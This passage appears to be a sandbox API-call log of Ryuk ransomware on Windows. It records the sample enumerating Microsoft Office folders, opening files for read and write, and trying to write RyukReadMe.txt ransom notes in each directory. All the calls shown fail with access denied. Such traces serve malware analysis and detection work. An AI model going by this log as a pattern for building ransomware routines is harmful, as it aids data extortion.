(lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.372] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\builtincontrolsschema.xsd", dwFileAttributes=0x80) returned 0 [0137.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\builtincontrolsschema.xsd" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\builtincontrolsschema.xsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.373] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.373] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.373] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.373] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.374] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\grvschema.xsd", dwFileAttributes=0x80) returned 0 [0137.374] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\grvschema.xsd" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\grvschema.xsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.374] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.374] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.374] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.374] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.374] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Messenger.xml", dwFileAttributes=0x80) returned 0 [0137.374] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Messenger.xml" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\messenger.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.374] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.374] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.374] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.374] SetLastError (dwErrCode=0x0) [0137.375] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.375] GetLastError () returned 0x5 [0137.375] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0137.375] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.375] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Space Templates\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2d60 [0137.375] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0137.375] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0137.375] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0137.375] SetLastError (dwErrCode=0x0) [0137.375] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Space Templates\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\space templates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.375] GetLastError () returned 0x5 [0137.375] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0137.375] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.375] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.375] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.375] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterApplicationDescriptors.xml", dwFileAttributes=0x80) returned 0 [0137.376] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterApplicationDescriptors.xml" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\starterapplicationdescriptors.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.376] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.376] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.376] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.376] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.377] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterNotificationDescriptors.xml", dwFileAttributes=0x80) returned 0 [0137.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterNotificationDescriptors.xml" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\starternotificationdescriptors.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.377] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.377] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.377] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.377] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.377] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterToolTemplates.xml", dwFileAttributes=0x80) returned 0 [0137.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\StarterToolTemplates.xml" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\startertooltemplates.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.377] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.377] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.377] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0137.377] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0137.378] SetLastError (dwErrCode=0x0) [0137.378] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\xml files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.378] GetLastError () returned 0x5 [0137.378] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0137.378] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.378] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0137.378] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0137.378] SetLastError (dwErrCode=0x0) [0137.378] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.378] GetLastError () returned 0x5 [0137.378] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.378] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.378] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.378] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.378] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.378] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.378] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.378] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.378] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.378] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.378] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.378] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\IMDIMP.ADD", dwFileAttributes=0x80) returned 0 [0137.379] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\IMDIMP.ADD" (normalized: "c:\\program files\\microsoft office\\office14\\imdimp.add"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.379] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.379] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.379] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.379] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.379] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.379] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.379] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.379] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.379] SetLastError (dwErrCode=0x0) [0137.379] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.379] GetLastError () returned 0x5 [0137.379] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.379] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.379] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2d00 [0137.381] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.381] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.381] SetLastError (dwErrCode=0x0) [0137.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.381] GetLastError () returned 0x5 [0137.381] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0137.381] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.381] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2d60 [0137.383] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.383] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.383] SetLastError (dwErrCode=0x0) [0137.383] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomformservices\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.383] GetLastError () returned 0x5 [0137.383] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0137.383] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.383] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2dc0 [0137.384] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0137.384] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0137.384] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0137.384] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.384] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12\\Microsoft.Office.InfoPath.xml", dwFileAttributes=0x80) returned 0 [0137.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12\\Microsoft.Office.InfoPath.xml" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomformservices\\infopathomformservicesv12\\microsoft.office.infopath.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.385] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.385] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.385] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0137.385] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.385] SetLastError (dwErrCode=0x0) [0137.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\InfoPathOMFormServicesV12\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomformservices\\infopathomformservicesv12\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.385] GetLastError () returned 0x5 [0137.385] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0137.385] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.385] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.385] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.385] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.386] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\Microsoft.Office.InfoPath.xml", dwFileAttributes=0x80) returned 0 [0137.386] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\Microsoft.Office.InfoPath.xml" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomformservices\\microsoft.office.infopath.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.386] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.386] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.386] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0137.386] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0137.386] SetLastError (dwErrCode=0x0) [0137.386] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMFormServices\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomformservices\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.386] GetLastError () returned 0x5 [0137.386] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0137.386] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.386] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.386] SetLastError (dwErrCode=0x0) [0137.386] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.387] GetLastError () returned 0x5 [0137.387] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0137.387] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.387] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2d60 [0137.387] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.387] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.387] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.387] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.387] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12\\Microsoft.Office.InfoPath.xml", dwFileAttributes=0x80) returned 0 [0137.388] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12\\Microsoft.Office.InfoPath.xml" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomv12\\microsoft.office.infopath.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.388] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.388] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.388] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0137.388] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0137.388] SetLastError (dwErrCode=0x0) [0137.388] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\InfoPathOMV12\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\infopathomv12\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.388] GetLastError () returned 0x5 [0137.388] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0137.388] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.388] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.388] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.388] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.389] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\Microsoft.Office.InfoPath.xml", dwFileAttributes=0x80) returned 0 [0137.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\Microsoft.Office.InfoPath.xml" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\microsoft.office.infopath.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.389] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.389] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.389] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0137.389] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0137.389] SetLastError (dwErrCode=0x0) [0137.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\infopathom\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.389] GetLastError () returned 0x5 [0137.389] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.389] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.389] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.389] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.389] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.389] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Installed_resources14.xss", dwFileAttributes=0x80) returned 0 [0137.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Installed_resources14.xss" (normalized: "c:\\program files\\microsoft office\\office14\\installed_resources14.xss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.390] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.390] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.390] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.390] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.391] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Installed_schemas14.xss", dwFileAttributes=0x80) returned 0 [0137.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Installed_schemas14.xss" (normalized: "c:\\program files\\microsoft office\\office14\\installed_schemas14.xss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.391] CloseHandle 